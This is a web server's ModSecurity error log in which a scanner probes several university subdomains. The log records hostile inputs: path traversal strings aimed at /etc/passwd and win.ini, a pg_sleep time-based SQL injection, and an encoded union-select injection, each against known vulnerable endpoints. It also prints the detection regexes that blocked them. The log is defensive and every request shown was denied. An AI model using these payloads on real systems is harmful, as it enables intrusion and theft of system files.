[Tue Aug 29 11:36:25.286397 2023] [:error] [pid 1409] [client 143.42.78.27] ModSecurity: Rule 7fe1c67ac3c8 [id "981246"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "239"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/xmlpserver/services/XMLPService"] [unique_id "ZO11ycCo-f0AAAWBBP8AAAAB"]
[Tue Aug 29 11:36:25.580499 2023] [:error] [pid 1423] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ycCo-f0AAAWPpXQAAAAH"]
[Tue Aug 29 11:36:25.654728 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../..// found within ARGS:file_name: ../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/tsaupload.cgi"] [unique_id "ZO11ycCo-f0AAATQXmcAAAAO"]
[Tue Aug 29 11:36:25.695415 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../..// found within ARGS:file_name: ../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/tsaupload.cgi"] [unique_id "ZO11ycCo-f0AAATQXmkAAAAO"]
[Tue Aug 29 11:36:25.750493 2023] [:error] [pid 1423] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ycCo-f0AAAWPpXsAAAAH"]
[Tue Aug 29 11:36:26.041103 2023] [:error] [pid 1423] [client 143.42.78.27] ModSecurity: Rule 7fe1c67ac3c8 [id "981246"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "239"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/xmlpserver/services/XMLPService"] [unique_id "ZO11ysCo-f0AAAWPpX8AAAAH"]
[Tue Aug 29 11:36:26.064614 2023] [:error] [pid 1434] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ysCo-f0AAAWa-UEAAAAI"]
[Tue Aug 29 11:36:26.075227 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ysCo-f0AAAUbg6sAAABQ"]
[Tue Aug 29 11:36:26.097358 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ysCo-f0AAAUbg6wAAABQ"]
[Tue Aug 29 11:36:26.593468 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ysCo-f0AAAWcCPsAAAAL"]
[Tue Aug 29 11:36:27.540574 2023] [:error] [pid 1444] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../..// found within ARGS:file_name: ../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/tsaupload.cgi"] [unique_id "ZO11y8Co-f0AAAWkfS4AAAAQ"]
[Tue Aug 29 11:36:27.541701 2023] [:error] [pid 1446] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11y8Co-f0AAAWmoc0AAAAS"]
[Tue Aug 29 11:36:27.545321 2023] [:error] [pid 1448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ); --\\x22 found within ARGS:table_name: pg_user\\x22; select pg_sleep(6); --\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/v2/open/rowsInfo"] [unique_id "ZO11y8Co-f0AAAWoVzcAAAAV"]
[Tue Aug 29 11:36:27.546236 2023] [:error] [pid 1449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11y8Co-f0AAAWpXfsAAAAW"]
[Tue Aug 29 11:36:27.549439 2023] [:error] [pid 1450] [client 143.42.78.27] ModSecurity: Rule 7fe1c67ac3c8 [id "981246"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "239"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/xmlpserver/services/XMLPService"] [unique_id "ZO11y8Co-f0AAAWqun4AAAAX"]
[Tue Aug 29 11:36:28.403127 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ccmivr/IVRGetAudioFile.do"] [unique_id "ZO11zMCo-f0AAAV9byUAAAAA"]
[Tue Aug 29 11:36:28.421256 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ccmivr/IVRGetAudioFile.do"] [unique_id "ZO11zMCo-f0AAAWlCa8AAAAR"]
[Tue Aug 29 11:36:28.423316 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ccmivr/IVRGetAudioFile.do"] [unique_id "ZO11zMCo-f0AAAV9byYAAAAA"]
[Tue Aug 29 11:36:28.434743 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ccmivr/IVRGetAudioFile.do"] [unique_id "ZO11zMCo-f0AAASEJdQAAAAE"]
[Tue Aug 29 11:36:28.441421 2023] [:error] [pid 1444] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:true_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:true_path: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php/Pan/ShareUrl/downloadSharedFile"] [unique_id "ZO11zMCo-f0AAAWkfTEAAAAQ"]
[Tue Aug 29 11:36:28.451307 2023] [:error] [pid 1446] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:true_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:true_path: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php/Pan/ShareUrl/downloadSharedFile"] [unique_id "ZO11zMCo-f0AAAWmodcAAAAS"]
[Tue Aug 29 11:36:28.453110 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:true_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:true_path: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php/Pan/ShareUrl/downloadSharedFile"] [unique_id "ZO11zMCo-f0AAAWcCQsAAAAL"]
[Tue Aug 29 11:36:28.456462 2023] [:error] [pid 1448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:true_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:true_path: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php/Pan/ShareUrl/downloadSharedFile"] [unique_id "ZO11zMCo-f0AAAWoV0cAAAAV"]
[Tue Aug 29 11:36:28.463021 2023] [:error] [pid 1444] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:true_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:true_path: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php/Pan/ShareUrl/downloadSharedFile"] [unique_id "ZO11zMCo-f0AAAWkfTIAAAAQ"]
[Tue Aug 29 11:36:28.464260 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ccmivr/IVRGetAudioFile.do"] [unique_id "ZO11zMCo-f0AAAV9bygAAAAA"]
[Tue Aug 29 11:36:29.364509 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:true_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:true_path: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php/Pan/ShareUrl/downloadSharedFile"] [unique_id "ZO11zcCo-f0AAAWcCQ4AAAAL"]
[Tue Aug 29 11:36:29.375059 2023] [:error] [pid 1435] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ccmivr/IVRGetAudioFile.do"] [unique_id "ZO11zcCo-f0AAAWbE9gAAAAK"]
[Tue Aug 29 11:36:30.372864 2023] [:error] [pid 1448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:folder: ../../../../../../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11zsCo-f0AAAWoV0sAAAAV"]
[Tue Aug 29 11:36:30.375159 2023] [:error] [pid 1450] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:folder: ../../../../../../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11zsCo-f0AAAWqupEAAAAX"]
[Tue Aug 29 11:36:30.385549 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:folder: ../../../../../../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11zsCo-f0AAATQXm8AAAAO"]
[Tue Aug 29 11:36:30.390159 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:folder: ../../../../../../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11zsCo-f0AAAWlCbkAAAAR"]
[Tue Aug 29 11:36:30.421615 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:folder: ../../../../../../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11zsCo-f0AAASEJd0AAAAE"]
[Tue Aug 29 11:36:31.397327 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:folder: ../../../../../../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11z8Co-f0AAASEJeIAAAAE"]
[Tue Aug 29 11:36:32.378047 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO110MCo-f0AAAUbg7oAAABQ"]
[Tue Aug 29 11:36:32.379482 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110MCo-f0AAATQXncAAAAO"]
[Tue Aug 29 11:36:32.399837 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110MCo-f0AAATQXngAAAAO"]
[Tue Aug 29 11:36:32.401294 2023] [:error] [pid 1448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110MCo-f0AAAWoV1QAAAAV"]
[Tue Aug 29 11:36:32.408906 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110MCo-f0AAASHiDMAAAAD"]
[Tue Aug 29 11:36:33.411083 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:page: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/pandora_console/ajax.php"] [unique_id "ZO110cCo-f0AAASEJesAAAAE"]
[Tue Aug 29 11:36:33.426265 2023] [:error] [pid 1438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110cCo-f0AAAWexjEAAAAP"]
[Tue Aug 29 11:36:33.434718 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: % found within ARGS:keyword: %61%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%27%27%2b%28%53%45%4c%45%43%54%20%6d%64%35%28%39%39%39%39%39%39%39%29%29%2b%27"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/mobile/plugin/browser.jsp"] [unique_id "ZO110cCo-f0AAASEJewAAAAE"]
